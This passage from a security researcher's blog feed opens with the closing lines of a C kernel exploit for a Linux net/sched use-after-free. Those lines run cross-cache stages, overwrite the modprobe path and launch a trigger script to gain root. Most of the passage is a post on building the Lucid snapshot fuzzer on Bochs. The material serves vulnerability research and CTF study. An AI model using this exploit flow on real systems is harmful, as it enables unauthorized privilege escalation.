    <span class="c1">// Delete classes 1:1 and 1:2 </span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Deleting classes 1:1 and 1:2 and then cross-cache stage-3...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin class delete dev lo classid 1:1"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin class delete dev lo classid 1:2"</span><span class="p">);</span>
    <span class="n">cc_3</span><span class="p">();</span>

    <span class="c1">// Execute cross-cache stage 4</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Executing cross-cache stage-4...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">cc_4</span><span class="p">();</span>

    <span class="c1">// Execute cross-cache stage 5 and reclaim page with pipe writes</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Executing cross-cache stage-5 and reclaiming page...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">cc_5</span><span class="p">();</span>
    <span class="n">reclaim_page</span><span class="p">();</span>

    <span class="c1">// Overwrite modprobe path</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Overwriting modprobe path...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">overwrite_modprobe</span><span class="p">();</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Modprobe path is *probably* overwritten lol!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

    <span class="c1">// Execute trigger</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./trigger.sh"</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>]]></content><author><name></name></author><category term="kCTF" /><category term="CTF" /><category term="Kernel" /><category term="Exploit" /><summary type="html"><![CDATA[Background I’m trying to really focus this year on developing technically in a few ways. Part of that is reviewing kCTF entries. This helps me get a sense of what subsystems are producing the most bugs at the moment in the program and also keeps me up to date on buggy patterns to look for. Also I get to shamelessly steal players’ exploitation techniques as well. A lot of recent bugs have come from /net/sched so I was looking at patches for the subsystem and found a patch that claimed an exploitable UAF was possible. That patch is here. I didn’t realize at the time, but “Lion Ackermann” mentioned in the patch as the bug discoverer (and presumably exploiter) is a kCTF player.]]></summary></entry><entry><title type="html">Fuzzer Development 4: Snapshots, Code-Coverage, and Fuzzing</title><link href="https://h0mbre.github.io/Lucid_Snapshots_Coverage/" rel="alternate" type="text/html" title="Fuzzer Development 4: Snapshots, Code-Coverage, and Fuzzing" /><published>2024-06-23T00:00:00+00:00</published><updated>2024-06-23T00:00:00+00:00</updated><id>https://h0mbre.github.io/Lucid_Snapshots_Coverage</id><content type="html" xml:base="https://h0mbre.github.io/Lucid_Snapshots_Coverage/"><![CDATA[<h2 id="background">Background</h2>

<p>This is the next installment in a series of blogposts detailing the development process of a snapshot fuzzer that aims to utilize Bochs as a target execution engine. You can find the fuzzer and code in the <a href="https://github.com/h0mbre/Lucid">Lucid repository</a></p>

<h2 id="introduction">Introduction</h2>
<p>Previously, we left off with implementing enough of the Linux emulation logic to get Lucid running a <code class="language-plaintext highlighter-rouge">-static-pie</code> Bochs up to its start menu. Well, we’ve accomplished a lot in the intervening few months since then. We’ve now implemented snapshots, code-coverage feedback, and more Linux emulation logic to the point now that we can actually fuzz things! So in this post, we’ll review some of the major features that have been added to the codebase as well as some examples on how to set the fuzzer up for fuzzing.</p>

<h2 id="snapshots">Snapshots</h2>
<p>One of the key benefits to the design of this fuzzer (thank you <a href="https://x.com/gamozolabs">Brandon Falk</a>) is that the entire state of the emulated/target system is completely encapsulated by Bochs. The appeal here is that if we can reliably record and reset Bochs’ state, we get target snapshots by default. In the future, this will benefit us when our targets affect device states, something like fuzzing a network service. So now our problem becomes, how do we, on Linux, perfectly record and reset the state of a process?</p>

<p>Well, the solution I came up with I think is very aesthetically pleasing. We need to reset the following state in Bochs:</p>
<ul>
  <li>Any writable <code class="language-plaintext highlighter-rouge">PT_LOAD</code> memory segments in the Bochs image itself</li>
  <li>Bochs’ file-table</li>
  <li>Bochs’ dynamic memory, such as heap allocations</li>
  <li>Bochs’ extended CPU state: AVX registers, floating point unit, etc</li>
  <li>Bochs’ registers</li>
</ul>

<p>Right off the bat, dynamic memory should be pretty trivial to record since we handle all calls to <code class="language-plaintext highlighter-rouge">mmap</code> ourselves in our fuzzer in the syscall emulation code. So we can pretty easily snapshot MMU state that way. This also applies to the file-table, since we also control all file I/O the same way. For now though, I haven’t implemented file-table snapshotting because for my fuzzing harness I’m using for development, Bochs doesn’t touch any files. I’ve resorted to marking files as dirty if we are fuzzing and they are touched and just panicking at that point for now. Later, we should be able to approach file snapshotting the same way we do the MMU.</p>

<p>Extended CPU state can be saved with machine instructions</p>

<p>But an outstanding question for me was figuring out how to record and reset the <code class="language-plaintext highlighter-rouge">PT_LOAD</code> segments. We can’t really track the dirtying of these pages well on Linux userland because they’ll be happening natively. There’s some common approaches to this type of problem in the fuzzing space though <em>if you want to restore these pages differentially</em>:</p>
<ul>
  <li>Mark those pages as non-writable and handle write-access faults for each page. This approach will let you know if Bochs ever uses the writable page. Once you handle a fault, you can permanently mark the page as writable and then lazily reset it each fuzzing iteration.</li>
  <li>Use some of the utilities exposed for things like the Checkpoint Restore effort in <code class="language-plaintext highlighter-rouge">/proc</code> as discussed by <a href="https://narly.me/posts/resmack-detour-full-fuzzer-experiment/">d0c s4vage</a>.</li>
</ul>

<p>Ultimately though, I decided that for simplicity sake, I’d just reset all the writable segments each time.</p>

<p>The real problem however, is that Bochs dynamic memory allocations can be humungous because it will allocate heap memory to hold the emulated guest memory (your target system). So if you configure a guest VM with 2GB of RAM, Bochs will attempt to make a heap allocation of 2GB. This makes capturing and restoring the snapshot very expensive as a 2GB memcpy <em>each fuzzing iteration</em> would be very costly. So I needed a way to avoid this. Bochs <em>does</em> have memory access hooks however, so I could track dirtied memory in the guest this way. This might be a future implementation if we find that our current implementation becomes a performance bottleneck.</p>

<p>In line with my project philosophy for Lucid at the moment, which is that we’re ok sacrificing performance for either introspection or architecturual/implementation simplicity. I decided that there was a nice solution we could leverage given that we are the ones mapping Bochs into memory and not the kernel. As long as the ELF image loadable segments are ordered such that the writable segments are loaded last, this means that we start a block of memory that needs resetting. At this point you can think of the mapping like this in memory:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>|-------------------------------------------------------|
|            Non-Writable ELF Segments                  |
|-------------------------------------------------------|   &lt;-- Start of memory that we need to record and restore
|              Writable ELF Segments                    |
|-------------------------------------------------------|
</code></pre></div></div>

<p>This is nice for us because what we actually have now is the start of a <em>contiguous block of writable memory</em> that we need to restore each fuzzing iteration. The rest of the mutable memory that Bochs will affect that we care about for snapshots can be arbitrarily mapped, let’s think about it:</p>
<ul>
  <li>Extended state save area for Bochs: Yep, we control where this is mapped, we can map this right up against the last writable ELF segment with <code class="language-plaintext highlighter-rouge">mmap</code> and <code class="language-plaintext highlighter-rouge">MAP_FIXED</code>. Now our continguous block contains the extended state as well.</li>
  <li>MMU Dynamic Memory (Brk, Mmap): Yep, we control this because we pre-allocate dynamic memory and then use these syscalls as basically bump allocator APIs so this is also now part of our contiguous block.</li>
</ul>

<p>So now, we can conceptualize the entire block of memory that we need to track for snapshots as:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>|-------------------------------------------------------|
|            Non-Writable ELF Segments                  |
|-------------------------------------------------------|   &lt;-- Start of memory that we need to record and restore
|              Writable ELF Segments                    |
|-------------------------------------------------------|
|             Bochs Extended CPU State                  |
|-------------------------------------------------------|
|                Bochs MMU/Brk Pool                     |
|-------------------------------------------------------|   &lt;-- End of memory that we need to record and restore
</code></pre></div></div>

<p>So why do we care about the writable memory being compact and contiguous like this? We still face the issue where the MMU/Brk pool of memory is way too large to do a giant <code class="language-plaintext highlighter-rouge">memcpy</code> each fuzzing iteration. Our solution must either use differential resets (ie, only reset what was dirty) or it must find a new way to do wholesale restoration since <code class="language-plaintext highlighter-rouge">memcpy</code> is not good enough.</p>

<p>Without wanting to noodle over differential resets and trying to focus on simplicity, I settled on an efficient way to use the concept of contiguous memory to our advantage for resetting the entire block without relying on <code class="language-plaintext highlighter-rouge">memcpy</code>. We can cache the snapshot contents in memory for the duration of the fuzzer by using Linux’s shared memory objects which are allocated with <code class="language-plaintext highlighter-rouge">libc::shm_open</code>. This is basically like opening a file that is backed by shared memory, so we won’t really trigger any disk reads or expensive file I/O when we read the contents for each snapshot restoration.</p>

<p>Next, when it’s time to restore, we can simply <code class="language-plaintext highlighter-rouge">mmap</code> that “file” overtop of the dirty continguous block. They will have the same size, right? And we control the location of the contiguous memory block, so this makes resetting dirty memory extremely easy! It’s literally mostly just this code:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// This function will take the saved data in the shm object and just mmap it</span>
<span class="c1">// overtop of the writable memory block to restore the memory contents</span>
<span class="nd">#[inline]</span>
<span class="k">fn</span> <span class="nf">restore_memory_block</span><span class="p">(</span><span class="n">base</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">length</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">fd</span><span class="p">:</span> <span class="nb">i32</span><span class="p">)</span> <span class="k">-&gt;</span>
    <span class="nb">Result</span><span class="o">&lt;</span><span class="p">(),</span> <span class="n">LucidErr</span><span class="o">&gt;</span> <span class="p">{</span>
    <span class="c1">// mmap the saved memory contents overtop of the dirty contents</span>
    <span class="k">let</span> <span class="n">result</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nn">libc</span><span class="p">::</span><span class="nf">mmap</span><span class="p">(</span>
            <span class="n">base</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_void</span><span class="p">,</span>
            <span class="n">length</span><span class="p">,</span>
            <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_READ</span> <span class="p">|</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_WRITE</span><span class="p">,</span>
            <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_PRIVATE</span> <span class="p">|</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_FIXED</span><span class="p">,</span>
            <span class="n">fd</span><span class="p">,</span>
            <span class="mi">0</span>
        <span class="p">)</span>
    <span class="p">};</span>

    <span class="k">if</span> <span class="n">result</span> <span class="o">==</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_FAILED</span> <span class="p">||</span> <span class="n">result</span> <span class="o">!=</span> <span class="n">base</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_void</span> <span class="p">{</span> 
        <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"Failed to mmap restore snapshot"</span><span class="p">));</span>
    <span class="p">}</span>

    <span class="nf">Ok</span><span class="p">(())</span>
<span class="p">}</span>
</code></pre></div></div>

<p>You just need the file descriptor for the shared memory object and you can perform the restoration for the memory contents. On my relatively old CPU and inside a VMWare VM, I was able to reset this memory block roughly 18k times per second which is definitely fast enough for a fuzzer like Lucid that will most certainly bottleneck on target emulation code. That’s not to say that we won’t have issues in the future however. A lot of kernel time with this approach is spent destroying the pages we <code class="language-plaintext highlighter-rouge">mmap</code> overtop of if they are no longer needed and this may be a bottleneck if we scale our fuzzing up in the future. Time will tell. For now, I love how simple and easy the approach is. Shoutout to Dominik Maier and the rest of the fuzzing discord for helping me workshop the idea.</p>

<p>Second most important benefit behind the simplicity, is that the performance is relatively constant regardless of block-size. We get to take advantage of several efficient memory management optimizations of the Linux kernel and we don’t have an issue with 2GB <code class="language-plaintext highlighter-rouge">memcpy</code> operations slowing us down. With my current setup of having 64MB of guest memory allocated, this <code class="language-plaintext highlighter-rouge">shmem + mmap</code> approach was roughly 10x faster than a giant <code class="language-plaintext highlighter-rouge">memcpy</code>. We go from spending 13% of CPU time in the snapshot restoration code to 96% of the time with <code class="language-plaintext highlighter-rouge">memcpy</code>. So it works well for us right now.</p>

<p>Some other small things about snapshot restoration, we can “clone” an existing MMU, ie the one we saved during snapshot recording, to the current MMU (dirty) with something like this very trivially:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Copy the contents of an existing MMU, used for snapshot restore</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">restore</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span> <span class="n">mmu</span><span class="p">:</span> <span class="o">&amp;</span><span class="n">Mmu</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">self</span><span class="py">.map_base</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.map_base</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.map_length</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.map_length</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.brk_base</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.brk_base</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.brk_size</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.brk_size</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.curr_brk</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.curr_brk</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.mmap_base</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.mmap_base</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.mmap_size</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.mmap_size</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.curr_mmap</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.curr_mmap</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.next_mmap</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.next_mmap</span><span class="p">;</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>We also have the GPRs of Bochs to worry about, but luckily for us, those are saved already when Bochs context switches into the Lucid in order to take the snapshot.</p>

<h1 id="triggering-snapshot-operations">Triggering Snapshot Operations</h1>
<p>The next thing we need to do is determine how to invoke snapshot logic from the harness running in the guest. I decided to piggyback off of Bochs’ approach and leverage specific types of NOP instruction sequences that are unlikely to exist in your target (collisions are not likely). Bochs uses these types of NOPs as magic breakpoints for when you’re using Bochs compiled in debugger mode. They are as follows:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mi">66</span><span class="o">:</span><span class="mi">87</span><span class="n">C9</span>  <span class="o">|</span> <span class="n">xchg</span> <span class="n">cx</span><span class="p">,</span><span class="n">cx</span>  <span class="o">|</span> <span class="mi">1000011111</span> <span class="mo">001</span> <span class="mo">001</span> <span class="o">-&gt;</span> <span class="mi">1</span>
<span class="mi">66</span><span class="o">:</span><span class="mi">87</span><span class="n">D2</span>  <span class="o">|</span> <span class="n">xchg</span> <span class="n">dx</span><span class="p">,</span><span class="n">dx</span>  <span class="o">|</span> <span class="mi">1000011111</span> <span class="mo">010</span> <span class="mo">010</span> <span class="o">-&gt;</span> <span class="mi">2</span>
<span class="mi">66</span><span class="o">:</span><span class="mi">87</span><span class="n">DB</span>  <span class="o">|</span> <span class="n">xchg</span> <span class="n">bx</span><span class="p">,</span><span class="n">bx</span>  <span class="o">|</span> <span class="mi">1000011111</span> <span class="mo">011</span> <span class="mo">011</span> <span class="o">-&gt;</span> <span class="mi">3</span>
<span class="mi">66</span><span class="o">:</span><span class="mf">87E4</span>  <span class="o">|</span> <span class="n">xchg</span> <span class="n">sp</span><span class="p">,</span><span class="n">sp</span>  <span class="o">|</span> <span class="mi">1000011111</span> <span class="mi">100</span> <span class="mi">100</span> <span class="o">-&gt;</span> <span class="mi">4</span>
<span class="mi">66</span><span class="o">:</span><span class="mi">87</span><span class="n">ED</span>  <span class="o">|</span> <span class="n">xchg</span> <span class="n">bp</span><span class="p">,</span><span class="n">bp</span>  <span class="o">|</span> <span class="mi">1000011111</span> <span class="mi">101</span> <span class="mi">101</span> <span class="o">-&gt;</span> <span class="mi">5</span>
<span class="mi">66</span><span class="o">:</span><span class="mi">87</span><span class="n">F6</span>  <span class="o">|</span> <span class="n">xchg</span> <span class="n">si</span><span class="p">,</span><span class="n">si</span>  <span class="o">|</span> <span class="mi">1000011111</span> <span class="mi">110</span> <span class="mi">110</span> <span class="o">-&gt;</span> <span class="mi">6</span>
<span class="mi">66</span><span class="o">:</span><span class="mi">87</span><span class="n">FF</span>  <span class="o">|</span> <span class="n">xchg</span> <span class="n">di</span><span class="p">,</span><span class="n">di</span>  <span class="o">|</span> <span class="mi">1000011111</span> <span class="mi">111</span> <span class="mi">111</span> <span class="o">-&gt;</span> <span class="mi">7</span>
</code></pre></div></div>
<p>This code is located in <code class="language-plaintext highlighter-rouge">bochs/cpu/data_xfer16.cc</code>. The <code class="language-plaintext highlighter-rouge">bxInstruction_c</code> struct has fields for this type of operation which track both the <code class="language-plaintext highlighter-rouge">src</code> register and the <code class="language-plaintext highlighter-rouge">dst</code> register. If they are the same, it checks them against their binary representation in the instruction encoding. For example <code class="language-plaintext highlighter-rouge">xchg dx, dx</code> would mean that <code class="language-plaintext highlighter-rouge">i-&gt;src()</code> and <code class="language-plaintext highlighter-rouge">i-&gt;dst()</code> both equal 2.</p>

<p>So in this instruction handler, we already have an example of how to implement logic to get Bochs to recognize instructions in the guest and <em>do something</em>.</p>

<p>We also have two types of snapshots really. One is when we use a regular “vanilla” version of Bochs with a GUI and what we’re aiming to do is “snapshot” the Bochs state to disk where we want to start fuzzing from. This is distinct from the snapshot that the fuzzer conceives of. So for instance, if you’ve built a harness like I have, you would want to boot up your system with Bochs in the GUI, get a shell, and finally run your harness. Your harness can then trigger one of these magic breakpoints to get Bochs to then save its state to disk, and this is what I’ve done.</p>

<p>Bochs has the ability to save its state to disk in the event that a user uses the “Suspend” feature, like pausing a VM. Bochs can then resume that suspended VM later in the future, great feature obviously. We can take advantage by just copy-pasta-ing that code right over to the instruction handler from where it normally lives (somewhere in the GUI simulation interface code). I think all I had to do was add an additional include to <code class="language-plaintext highlighter-rouge">data_xfer16.cc</code> and then hack in my logic as follows:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#if BX_SNAPSHOT
</span>  <span class="c1">// Check for take snapshot instruction `xchg dx, dx`</span>
  <span class="k">if</span> <span class="p">((</span><span class="n">i</span><span class="o">-&gt;</span><span class="n">src</span><span class="p">()</span> <span class="o">==</span> <span class="n">i</span><span class="o">-&gt;</span><span class="n">dst</span><span class="p">())</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="n">i</span><span class="o">-&gt;</span><span class="n">src</span><span class="p">()</span> <span class="o">==</span> <span class="mi">2</span><span class="p">))</span> <span class="p">{</span>
    <span class="n">BX_COMMIT_INSTRUCTION</span><span class="p">(</span><span class="n">i</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">BX_CPU_THIS_PTR</span> <span class="n">async_event</span><span class="p">)</span>
      <span class="k">return</span><span class="p">;</span>
    <span class="o">++</span><span class="n">i</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">save_dir</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"/tmp/lucid_snapshot"</span><span class="p">;</span>
    <span class="n">mkdir</span><span class="p">(</span><span class="n">save_dir</span><span class="p">,</span> <span class="mo">0777</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Saving Lucid snapshot to '%s'...</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">save_dir</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">SIM</span><span class="o">-&gt;</span><span class="n">save_state</span><span class="p">(</span><span class="n">save_dir</span><span class="p">))</span> <span class="p">{</span>
      <span class="n">printf</span><span class="p">(</span><span class="s">"Successfully saved snapshot</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
      <span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span>
      <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">else</span> <span class="p">{</span>
      <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to save snapshot</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">BX_EXECUTE_INSTRUCTION</span><span class="p">(</span><span class="n">i</span><span class="p">);</span>
  <span class="p">}</span>
<span class="cp">#endif
</span></code></pre></div></div>

<p>So if we build a vanilla Bochs with a GUI and define <code class="language-plaintext highlighter-rouge">BX_SNAPSHOT</code> during the build process, we should be able to make Bochs save its state to disk when it encounters a <code class="language-plaintext highlighter-rouge">xchg dx, dx</code> instruction as if the end-user has pressed suspend at the perfect moment down to the instruction in our harness.</p>

<p>Now in the fuzzer, we will tell our Bochs to resume the saved-to-disk state and right as its about to emulate its first instruction in the CPU-loop, break back into the fuzzer and take the sort of snapshot the fuzzer is going to use that we discussed in the previous section. This was done by hacking in some code in <code class="language-plaintext highlighter-rouge">cpu/cpu.cc</code> as follows:</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">jmp_buf</span> <span class="n">BX_CPU_C</span><span class="o">::</span><span class="n">jmp_buf_env</span><span class="p">;</span>

<span class="kt">void</span> <span class="n">BX_CPU_C</span><span class="o">::</span><span class="n">cpu_loop</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="cp">#if BX_SUPPORT_HANDLERS_CHAINING_SPEEDUPS
</span>  <span class="k">volatile</span> <span class="n">Bit8u</span> <span class="n">stack_anchor</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

  <span class="n">BX_CPU_THIS_PTR</span> <span class="n">cpuloop_stack_anchor</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">stack_anchor</span><span class="p">;</span>
<span class="cp">#endif
</span>
<span class="cp">#if BX_DEBUGGER
</span>  <span class="n">BX_CPU_THIS_PTR</span> <span class="n">break_point</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="n">BX_CPU_THIS_PTR</span> <span class="n">magic_break</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="n">BX_CPU_THIS_PTR</span> <span class="n">stop_reason</span> <span class="o">=</span> <span class="n">STOP_NO_REASON</span><span class="p">;</span>
<span class="cp">#endif
</span>
<span class="c1">// Place the Lucid snapshot taking code here above potential long jump returns</span>
<span class="cp">#if BX_LUCID
</span>  <span class="n">lucid_take_snapshot</span><span class="p">();</span>
<span class="cp">#endif
</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">setjmp</span><span class="p">(</span><span class="n">BX_CPU_THIS_PTR</span> <span class="n">jmp_buf_env</span><span class="p">))</span> <span class="p">{</span>
    <span class="c1">// can get here only from exception function or VMEXIT</span>
    <span class="n">BX_CPU_THIS_PTR</span> <span class="n">icount</span><span class="o">++</span><span class="p">;</span>
    <span class="n">BX_SYNC_TIME_IF_SINGLE_PROCESSOR</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="cp">#if BX_DEBUGGER || BX_GDBSTUB
</span>    <span class="k">if</span> <span class="p">(</span><span class="n">dbg_instruction_epilog</span><span class="p">())</span> <span class="k">return</span><span class="p">;</span>
<span class="cp">#endif
#if BX_GDBSTUB
</span>    <span class="k">if</span> <span class="p">(</span><span class="n">bx_dbg</span><span class="p">.</span><span class="n">gdbstub_enabled</span><span class="p">)</span> <span class="k">return</span><span class="p">;</span>
<span class="cp">#endif
</span>  <span class="p">}</span>
</code></pre></div></div>

<p>You can see that if we have built Bochs for the fuzzer (with <code class="language-plaintext highlighter-rouge">BX_LUCID</code> defined), we’ll call the take snapshot function before we start emulating instructions or even return from an exception via <code class="language-plaintext highlighter-rouge">longjmp</code> or similar logic. The logic of the take snapshot code is very simple, we just set some variables in the global execution context to let Lucid know why we exited the VM and what it should do about it:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Call into Lucid to take snapshot of current Bochs state</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">optimize</span><span class="p">(</span><span class="mi">0</span><span class="p">)))</span> <span class="kt">void</span> <span class="nf">lucid_take_snapshot</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_lucid_ctx</span><span class="p">)</span>
        <span class="k">return</span><span class="p">;</span>

    <span class="c1">// Set execution mode to Bochs</span>
    <span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">mode</span> <span class="o">=</span> <span class="n">BOCHS</span><span class="p">;</span>

    <span class="c1">// Set the exit reason</span>
    <span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">exit_reason</span> <span class="o">=</span> <span class="n">TAKE_SNAPSHOT</span><span class="p">;</span>

    <span class="c1">// Inline assembly to switch context back to fuzzer</span>
    <span class="n">__asm__</span> <span class="p">(</span>
        <span class="s">"push %%r15</span><span class="se">\n\t</span><span class="s">"</span>          <span class="c1">// Save r15 register</span>
        <span class="s">"mov %0, %%r15</span><span class="se">\n\t</span><span class="s">"</span>       <span class="c1">// Move context pointer into r15</span>
        <span class="s">"call *(%%r15)</span><span class="se">\n\t</span><span class="s">"</span>       <span class="c1">// Call context_switch</span>
        <span class="s">"pop %%r15"</span>               <span class="c1">// Restore r15 register</span>
        <span class="o">:</span>                         <span class="c1">// No output</span>
        <span class="o">:</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">g_lucid_ctx</span><span class="p">)</span>       <span class="c1">// Input</span>
        <span class="o">:</span> <span class="s">"memory"</span>                <span class="c1">// Clobber</span>
    <span class="p">);</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now Lucid can save this state as a snapshot and reset to it after each fuzzing iteration, all by virtue of just including a simple <code class="language-plaintext highlighter-rouge">xchg dx, dx</code> instruction in your fuzzing harness, very cool stuff imo! At the end of a fuzzcase, when we’ve reset the snapshot state and we want to start executing Bochs again from the snapshot state, we just call this function via a context switch which ends with a simple <code class="language-plaintext highlighter-rouge">ret</code> instruction. This will behave as if Bochs is just returning from calling <code class="language-plaintext highlighter-rouge">lucid_take_snapshot</code> as a normal function:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Restore Bochs' state from the snapshot</span>
<span class="k">fn</span> <span class="nf">restore_bochs_execution</span><span class="p">(</span><span class="n">contextp</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Set the mode to Bochs</span>
    <span class="k">let</span> <span class="n">context</span> <span class="o">=</span> <span class="nn">LucidContext</span><span class="p">::</span><span class="nf">from_ptr_mut</span><span class="p">(</span><span class="n">contextp</span><span class="p">);</span>
    <span class="n">context</span><span class="py">.mode</span> <span class="o">=</span> <span class="nn">ExecMode</span><span class="p">::</span><span class="n">Bochs</span><span class="p">;</span>

    <span class="c1">// Get the pointer to the snapshot regs</span>
    <span class="k">let</span> <span class="n">snap_regsp</span> <span class="o">=</span> <span class="n">context</span><span class="nf">.snapshot_regs_ptr</span><span class="p">();</span>

    <span class="c1">// Restore the extended state</span>
    <span class="n">context</span><span class="nf">.restore_xstate</span><span class="p">();</span>

    <span class="c1">// Move that pointer into R14 and restore our GPRs</span>
    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nd">asm!</span><span class="p">(</span>
            <span class="s">"mov r14, {0}"</span><span class="p">,</span>
            <span class="s">"mov rax, [r14 + 0x0]"</span><span class="p">,</span>
            <span class="s">"mov rbx, [r14 + 0x8]"</span><span class="p">,</span>
            <span class="s">"mov rcx, [r14 + 0x10]"</span><span class="p">,</span>
            <span class="s">"mov rdx, [r14 + 0x18]"</span><span class="p">,</span>
            <span class="s">"mov rsi, [r14 + 0x20]"</span><span class="p">,</span>
            <span class="s">"mov rdi, [r14 + 0x28]"</span><span class="p">,</span>
            <span class="s">"mov rbp, [r14 + 0x30]"</span><span class="p">,</span>
            <span class="s">"mov rsp, [r14 + 0x38]"</span><span class="p">,</span>
            <span class="s">"mov r8, [r14 + 0x40]"</span><span class="p">,</span>
            <span class="s">"mov r9, [r14 + 0x48]"</span><span class="p">,</span>
            <span class="s">"mov r10, [r14 + 0x50]"</span><span class="p">,</span>
            <span class="s">"mov r11, [r14 + 0x58]"</span><span class="p">,</span>
            <span class="s">"mov r12, [r14 + 0x60]"</span><span class="p">,</span>
            <span class="s">"mov r13, [r14 + 0x68]"</span><span class="p">,</span>
            <span class="s">"mov r15, [r14 + 0x78]"</span><span class="p">,</span>
            <span class="s">"mov r14, [r14 + 0x70]"</span><span class="p">,</span>
            <span class="s">"sub rsp, 0x8"</span><span class="p">,</span>             <span class="c1">// Recover saved CPU flags </span>
            <span class="s">"popfq"</span><span class="p">,</span>
            <span class="s">"ret"</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">snap_regsp</span><span class="p">,</span>
        <span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>That’s pretty much it for snapshots I think, curious to see how they’ll perform in the future, but they’re doing the trick now.</p>

<h1 id="code-coverage-feedback">Code Coverage Feedback</h1>
